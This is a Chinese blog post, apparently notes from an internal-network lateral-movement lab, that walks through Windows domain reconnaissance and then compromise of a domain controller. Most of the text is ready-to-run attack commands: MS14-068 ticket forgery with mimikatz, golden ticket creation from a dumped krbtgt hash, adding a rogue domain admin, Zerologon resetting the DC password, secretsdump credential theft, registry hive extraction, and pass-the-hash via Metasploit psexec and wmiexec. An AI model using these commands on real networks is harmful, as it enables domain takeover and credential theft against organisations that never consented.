美文网首页
内网横向打靶

内网横向打靶

作者: migrate_ | 来源:发表于2021-10-29 16:28 被阅读0次

遵纪守法

任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益

信息收集

  • 获取主机安装的软件和版本
wmic product get name,version
  • 获取主机进程列表 (等同于tasklist)
wmic process list brief
  • 查询域内用户的SID
whoami /all
或者
wmic useraccount get Caption,sid
  • 查询域内当前用户的信息
net user 用户名 /domain
  • 查询ip信息
ipconfig /all
或者
systeminfo
知道域控xxx.com 定位域控ip
nslookup xxx.com
  • 查询本机是否在域内
net config workstation
  • 判断主域 而不是子域
net time /domain
  • win下ICMP协议探测存活主机
for /l %i in (1,1,255) do @ping 192.168.64.%i -w 1 -n 1|find /i "ttl="
  • Linux下使用ping命令扫描C段
for k in $(seq 1 255);do ping -c 1 192.168.99.$k|grep "ttl"|awk -F "[:]+" '{print $4}'; done
  • 查询有几个域
net view /domain
  • 查看 xxx 域中的计算机列表
net view /domain:xxx
  • 查看域用户
net user /domain
  • 查询域内所有用户组列表 (查看域里面的组)
net group /domain
  • 查看域管理员
net group "domain admins" /domain 
  • 查看域控制器
net group "domain controllers" /domain 
  • 查找信任域
nltest /domain_trusts
返回所有信任192.168.117.3域的所有域:
nltest /domain_trusts /all_trusts /v /server:192.168.117.3
  • 查找域控
nltest /dsgetdc:域名 
nltest /dsgetdc:whoamianony.org
  • 查找域控主机名
nltest /dclist:whoamianony.org
  • 查找域控的主机名对应ip
net time /domain 得到域名 xx.com
nslookup xx.com  得到域控ip
或者
nslookup -type=SRV _ldap._tcp
或者
使用管理员权限运行cmd
netdom query dc  查看所有dc域控制器
你再使用ping 控制器名称就能获取到dc的ip了
ping DC
  • windows使用cmd命令行获取管理员权限
用户名:Administrator 运行cmd程序
温馨提示:若有密码则输入密码,输入密码时不可见密码。
runas /noprofile /user:Administrator cmd

MS14-068域提权漏洞

  • mimikatz
  • 拿下了一台域内的普通计算机,并获得普通域用户以及密码/hash值,以及用户的suid
  • 利用MS14-068来提权,先检查下域控是否有MS14-068
  • CVE编号CVE-2014-6324,补丁为 3011780
  • 如果返回为空就说明没有打补丁,存在漏洞,需要注意的是域内普通用户提权成功后是有时效性的。
systeminfo |find "3011780"
  • 漏洞利用
使用 whoami/user 得到普通域用户的sid
ms14-068 -u venus@venus.com -s sid -d 192.168.63.137(域控) -p admin@123  生成一个票据 TGT_cache文件
例子:
ms14-068.exe -u moretz@whoamianony.org -s S-1-5-21-1315137663-3706837544-1429009142-1115 -d 192.168.93.30 -p Moretz2021
  • 查看票据
kerberos::list
  • 清除票据
kerberos::purge
  • 利用mimikatz注入票据到内存
kerberos::ptc c:\TGT_cache票据文件 //将票据注入到内存中
  • 执行命令(这里登录时,要使用机器名,不要使用IP,否则没办法攻击成功)
net use \\DC.whoamianony.org
dir \\DC.whoamianony.org\c$
  • 或者去提权
psexec.exe \\DC.whoamianony.org cmd.exe

黄金票据

伪造金票的所需条件
  • 域名称
  • 域的SID值
  • 域的KRBTGT账号的HASH
  • 伪造任意用户名
提升权限
privilege::debug
导出域内所有用户的账号密码
lsadump::dcsync /domain:test.com /all /csv
找到krbtgt的hash
lsadump::dcsync /domain:test.com /user:krbtgt
生成黄金票据
kerberos::golden /admin:Administrator /domain:venus.com /sid:域的sid(不带后缀的数字) /krbtgt:这个用户的hash /ticket:Administrator.kirbi(票据的名字)
例子:
kerberos::golden /user:Administrator /domain:test.com /sid:S-1-5-21-3763276348-88739081-2848684050 /krbtgt:d8d2ad72a119a8d418703f7a16580af6 /ticket:1.kirbi
执行结束后,会在运行目录生成一个1.kirbi的文件
清除票据
kerberos::purge
然后注入票据
kerberos::ptt Administrator.kirbi
查看票据是否成功
kerberos::tgt

遇到的一些坑

  • 这种票据只会存在管理员权限的命令行窗口中

  • 做完票据后执行lsadump::dcsync /domain:test.com /user:krbtgt会报错。后来研究了很久才发现,只要稍等几分钟然后测试执行那个命令就会成功,或者退出mimikatz再进去就可以成功,原理我也不知道。

  • 添加域管用户aaa:

net user aaa Qwe123... /add /domain
net group "Domain Admins" aaa /add /domain

CVE-2020-1472 (NetLogon特权提升漏洞)

impacket安装:
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
python3 setup.py install
(如果事先安装了impacket可使用pip3 uninstall impacket命令卸载)
python3 zerologon_tester.py dc 192.168.93.30
Success! DC can be fully compromised by a Zerologon attack 出现这个就说明存在漏洞
python3 set_empty_pw.py DC 192.168.93.30
  • 使用impacket中的工具将域控的密码dump下来
python3 secretsdump.py WHOAMIANONY.ORG/DC\$@192.168.93.30 -just-dc -no-pass
  • 得到hash之后,使用MSF PSEXEC模块上线
use exploit/windows/smb/psexec
set SMBUser administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:ab89b1295e69d353dd7614c7a3a80cec
set payload windows/meterpreter/bind_tcp
set rhost 192.168.93.30
run/exploit

或者

  • 使用空密码dump域控上的hash。
python3 secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 WHOAMIANONY.ORG/DC\$@192.168.93.30
  • 此时DC$用户hash已被替换为31d6cfe0d16ae931b73c59d7e0c089c0(空)
  • 使用administrator的hash横向连接过去。
python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:ab89b1295e69d353dd7614c7a3a80cec whoamianony/administrator@192.168.93.30

还原hash

  • 获取计算机账号原始hash
生成
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
-----------------
下载到Kali中
get system.save
get sam.save
get security.save
-----------------
下载完成之后进行删除
del /f system.save
del /f sam.save
del /f security.save
  • 查看域控hash
python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
1 (2).png
python3 reinstall_original_pw.py DC 192.168.93.30 7fd0cca5eafe480f617b04039bbf115c
  • 使用空密码连接进行验证是否恢复
python3 secretsdump.py WHOAMIANONY.ORG/DC\$@192.168.93.30 -just-dc -no-pass

重点

一定要恢复域控hash,不然会导致脱域

相关文章

  • 内网横向打靶

    遵纪守法 任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危...

  • 内网打靶知识点总结

    msf内网主机存存活扫描 Metasploit 脚本Web传递攻击 meterpreter添加路由 生成木马 上传...

  • 内网渗透-横向攻击

    什么是内网横向攻击 当通过外部打点进入到目标内网时,需要利用现有的资源尝试获取更多的凭证与权限,进而达到控制整个内...

  • ssrf内网横向redis getshell

    漏洞环境 Weblogic 10.3版本内网ip网段:172.26.0.0/24 ssrf 漏洞验证 此处可以利用...

  • 内网渗透横向攻击流程

    拓扑环境 Kali Linux(攻击机) Centos6.4(web服务器) win7(域成员主机无法上网) wi...

  • 网络安全-Day52-内网横向渗透测试

    内网横向渗透测试 环境准备 1、虚拟机1:windows7:两张网卡,一张连外网,一张连内网 2、虚拟机2:ser...

  • 如何激发团队的能动性?

    把今天打靶和以前打靶的情况作对比,不难发现:今天大家的参与热情比较高,不管是打靶中还是打靶归来后保养枪支。 出现这...

  • 打靶

    曾经有一个小姑娘面试的时候有和我说过她听到过一句话”招聘就像打靶”终有中枪的那一天,只是时间的问题,

  • 打靶

    美国持枪是合法的,办张持枪证比办钓鱼证还容易,对居民身份也没什么太大要求,连没有绿卡的外国留学生也可以申请。最近美...

  • 打靶

    我年轻时喜欢运动,身体素质不错,只因家庭出身问题没能当兵。直到我下乡后被选调到了铁路,当了基干民兵才摸上枪,打靶的...

网友评论

      本文标题:内网横向打靶

      本文链接:https://www.haomeiwen.com/subject/xrlvaltx.html